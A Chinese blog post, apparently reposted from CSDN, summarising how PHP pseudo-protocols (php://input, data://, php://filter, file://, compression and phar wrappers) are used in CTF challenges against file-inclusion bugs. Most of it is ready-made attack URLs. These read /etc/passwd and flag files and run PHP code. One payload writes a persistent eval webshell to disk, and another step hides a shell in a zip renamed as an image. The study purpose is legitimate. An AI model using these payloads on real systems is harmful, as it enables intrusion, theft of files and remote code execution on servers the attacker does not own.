当前位置: 首页 > news >正文

PHP伪协议读取文件

news 来源:原创 2025/4/21 6:37:21

借鉴php伪协议实现命令执行,任意文件读取_ctf php文件读取-CSDN博客

总结

在ctf中常用的有data:// , php://input , php://filter ,file://

php://input ,data://用来执行命令
1.php://input 的用法
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
2.data://用法
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
php://filter,file://用来读取文件
3.php://filter用法
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php(读取php文件需要先加密以下才能读出来,并且拿到的源码需要进行base64解码下)
http://127.0.0.1/include.php?file=php://filter/resource=/flag
4.file://用法
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

file://协议

file://协议通常用于从本地文件系统读取文件内容

基本原理

  • file://协议:这是用于访问本地文件系统的协议。例如,file:///etc/passwd会尝试访问Linux系统上的/etc/passwd文件。

例如http://example.com/include.php?file=file:///etc/passwd

用法

/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext

示例:
1.file://[文件的绝对路径和文件名]

http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

2.file://[文件的相对路径和文件名]

http://127.0.0.1/include.php?file=./phpinfo.txt

3.http://网络位置和文件名 

http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

php://协议

php://协议是一种非常有用的功能,可以用来读取文件、输入流等。php提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流,标准输入输出流和错误描述符

常见的 php:// 协议

  1. php://input
    • 用于读取原始的POST数据。
    • 在某些情况下,可以用来绕过一些文件上传的限制。
  2. php://filter
    • 用于读取文件内容并进行过滤(如base64编码、解压缩等)。
    • 语法:php://filter/read=filter.name/resource=file
    • 例如:php://filter/read=convert.base64-encode/resource=flag.php 可以将 flag.php 文件的内容以base64编码形式输出。
  3. php://fd(PHP 7.0.0+):
    • 用于直接访问文件描述符。
    • 通常不常用在CTF中,但了解其存在有助于理解PHP的文件操作。
  4. php://memory 和 php://temp
    • 用于在内存或临时文件中读写数据。
    • 这些协议通常用于数据处理或流操作,不常用于直接读取文件。

php://filter使用

php://filter/read=convert.base64-encode/resource=[文件名]

php://filter/resource=[文件名]

php://input的使用

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>

执行一句话木马

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

data://协议

data://text/plain, ???

http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

?page=data://text/plain;base64,PD9waHAgZWNobyBwaHBpbmZvKCk7Pz4=

zip:// & bzip:// & zlib:// 协议

作用:

zip:// & bzip:// & zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可以修改为任意后缀名,如 jpg,png,gif,xxx等

compress.bzip2://file.bz2

压缩phpinfo.txt 为phpinfo.bz2 并上传(同样支持任意后缀名)

http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2
3.compress.zlib://file.gz

压缩phpinfo.txt 为phpinfo.gz 并上传(支持任意后缀名)

http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz

phar://协议

  • php解压缩包的一个函数,不管后缀是什么,都当作压缩包来解压。
  • 格式:
?file=phar://压缩包名/内部文件名
例:phar://x.zip/x.php
步骤:写一个一句话木马shell.php,然后用zip协议压缩为shell.zip,
再将后缀改为png等其他格式

 

相关文章:

  • go语言优雅关机和优雅重启笔记
  • 计算机组成与体系结构:计算机结构的分类(classifications of computer architecture)
  • 数据通信学习笔记之OSPF其他内容3
  • TDengine 整体构架
  • Linux中服务器时间同步
  • 精益数据分析(8/126):从Airbnb案例看精益创业与数据驱动增长
  • 学习笔记十九——Rust多态
  • 不确定与非单调推理的模糊推理
  • Kotlin delay方法解析
  • 【C++】多态 - 从虚函数到动态绑定的核心原理
  • 精通 Spring Cache + Redis:避坑指南与最佳实践
  • Spring Boot 集成 Kafka 及实战技巧总结
  • Spring Boot自动装配原理(源码详细剖析!)
  • XSS学习1之http回顾
  • ASP.NET Core 最小 API:极简开发,高效构建(下)
  • Navicat、DataGrip、DBeaver在渲染 BOOLEAN 类型字段时的一种特殊“视觉风格”
  • XSS学习2
  • QT6 源(37):界面组件的总基类 QWidget 的源码阅读(下,c++ 代码部分)
  • 微服务与 SOA:架构异同全解析与应用指南
  • 【leetcode刷题日记】lc.300-最长递增子序列
  • 习近平致电祝贺诺沃亚当选连任厄瓜多尔总统
  • 重点并不在于设计更聪明的机器,而在于开发宇宙技术的多样性
  • 调查显示特朗普在经济问题上的支持率跌至其总统生涯最低
  • 孙颖莎4比1击败陈幸同,与蒯曼会师澳门世界杯女单决赛
  • 美政府公布1968年罗伯特·肯尼迪遇刺事件档案
  • 上海市市长龚正会见英伟达总裁黄仁勋,共创科技发展美好未来